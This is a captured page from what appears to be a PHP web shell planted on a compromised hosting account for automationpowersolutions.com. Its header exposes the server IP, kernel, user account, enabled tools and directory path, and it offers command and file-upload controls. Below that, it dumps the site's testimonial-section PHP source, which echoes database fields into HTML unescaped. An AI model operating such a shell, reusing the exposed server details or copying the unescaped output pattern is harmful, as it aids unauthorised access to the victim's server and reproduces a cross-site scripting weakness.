Server IP : 103.53.40.154 / Your IP : 18.226.226.158 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/automationpowersolutions.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Testimonial Section Three --> <section class="testimonial-section-three" style="background-image:url(images/background/map.png)"> <div class="auto-container"> <!-- Sec Title --> <div class="sec-title alternate centered"> <div class="title">Our Testimonial</div> <h2>Happy Client Says <br> About Us</h2> </div> <div class="three-item-carousel-two owl-carousel owl-theme"> <?php $sqltest = "SELECT * FROM `testimonial`"; $runtest = mysqli_query($db,$sqltest) or die("Query Not run"); while($datatest = mysqli_fetch_assoc($runtest)){ ?> <!-- Testimonial Block Two --> <div class="testimonial-block-two"> <div class="inner-box"> <div class="author-box"> <div class="author-inner"> <div class="author-image"> <img src="<?php echo $wspath?>images/resource/<?php echo $datatest['image']?>" alt="" /> </div> <strong><?php echo $datatest['name']?></strong> <!--<div class="designation">Founder & Ceo</div>--> </div> </div> <div class="text"><?php echo $datatest['review']?></div> <!--<div class="rating">--> <!-- <span class="fa fa-star"></span>--> <!-- <span class="fa fa-star"></span>--> <!-- <span class="fa fa-star"></span>--> <!-- <span class="fa fa-star"></span>--> <!-- <span class="fa fa-star"></span>--> <!--</div>--> </div> </div> <?php } ?> </div> </div> </section> <!-- End Testimonial Section Three -->